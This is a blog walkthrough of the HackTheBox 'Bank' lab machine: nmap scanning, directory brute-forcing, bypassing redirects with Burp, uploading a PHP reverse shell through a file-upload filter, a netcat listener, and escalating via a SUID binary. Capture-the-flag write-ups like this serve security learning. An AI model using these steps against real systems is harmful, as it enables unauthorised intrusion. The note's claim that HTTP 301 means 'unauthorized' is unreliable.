Bank HackTheBox Notes

Genius = https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/

IP address: 10.10.10.29

Recon

nmap -v -sU -sS -p- -A -T4 10.10.10.29

Port 80/tcp – http

Nmap -p 80 -sV 10.10.10.29

Reveals apache httpd 2.4.7 – no known critical vulnerabilities

Default Ubuntu Apache2 page

Port 53/tcp – DNS

Nmap -p 53 -sV 10.10.10.29

ISC BIND 9.9.5-3ubuntu0.14

Port 22/tcp – ssh

Nmap -p 22 -sV 10.10.10.29

OpenSSH 6.6.1p1

Continuing

I had to cheat on this one cause I don’t have the patience for this guessing crap. The accessible host on port 80 can be found at http://bank.htb

Running dirbuster we find the following

Machine generated alternative text:
http://bank.htb:80/ 
Scan Information IResults 
o 
Directory Stucture 
loads 
index.php 
login.php 
suppcrt.php 
nc 
Icons 
logout.php 
- List View: Dirs: 
301 
301 
302 
200 
302 
301 
302 
16 Files: 81 Results - Tree View 
Response Code 
Errors: o 
Response Size 
518 
516 
7654 
2307 
3623 
510 
329

Response codes:

301 unauthorized

302 redirect

200 successful

Looking at login.php there is nothing extraordinary however, support.php and index.php both provide redirect codes. Looking at this more closely we can see the response size of both these redirects are far from equal. Using burp suite or any sort of redirect blocker we can visualize the page presented before the redirect. Support.php provides an interesting page.

Used to remove automatic redirect

Machine generated alternative text:
Remove all JavaScript 
Remove tags 
convert HTTPS links to HTTP 
Remove secure flag from cookies 
'latch and Replace 
hese settings are used to automatically replace parts o 
Edit match/replace rule 
Specify the details of the match/replace rule. 
Type: 
Replace: 
Comment. 
Regex 
Remove 
Up 
Down 
Enabled 
o 
o 
o 
o 
Item 
Request header 
Request header 
Response header 
Request header 
Request header 
Response header 
Response header 
Response header 
Acc 
30[121 FOUND 
Response header 
301121 FOUND 
200 0K 
no redirect 
match 
X-XSS-Protection 
200 0K 
Literal 
Reg ex 
o 
pressed responses 
RS origin 
eaders 
Disable browser XSS protection 
no redirect

Now we can look at index.php and support.php properly. The support page has an option to upload files so this is likely our way in. Looking at the source code we can see the following which states that we may use a file extension of .htb to upload php files.

I personally used the following reverse shell http://pentestmonkey.net/tools/web-shells/php-reverse-shell followed by the command nc -lvp 4444. This gives us a shell as www-data which can be used to read the user.txt file.

Using “find / -user root -perm -4000 -print 2>/dev/null” we can find potentially vulnerable commands with a SUID bit.

Machine generated alternative text:
find / -user root -perm -4000 -print 2>/dev/null 
/var/htb/bin/emergency 
/usr/lib/eject/dmcrypt-get-device 
/usr/lib/openssh/ssh-keysign 
/usr/lib/dbus-l. O/dbus -daemon- launch-helper 
/usr/lib/policykit-l/polkit-agent-helper-l 
/usr/bin/chsh 
/usr/bin/passwd 
/usr/bin/chfn 
/usr/bin/pkexec 
/usr/bin/newgrp 
/usr/bin/traceroute6. iputils 
/usr/bin/gpasswd 
/usr/bin/sudo 
/usr/bin/mtr 
/usr/sbin/pppd 
/bin/ping 
/bin/ping6 
/bin/su 
/bin/fusermount 
/bin/mount 
/bin/umount

First one that sticks out to me is /var/htb/bin/emergency and of course executing this command gives us a root shell.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Create a website or blog at WordPress.com

Up ↑

%d bloggers like this: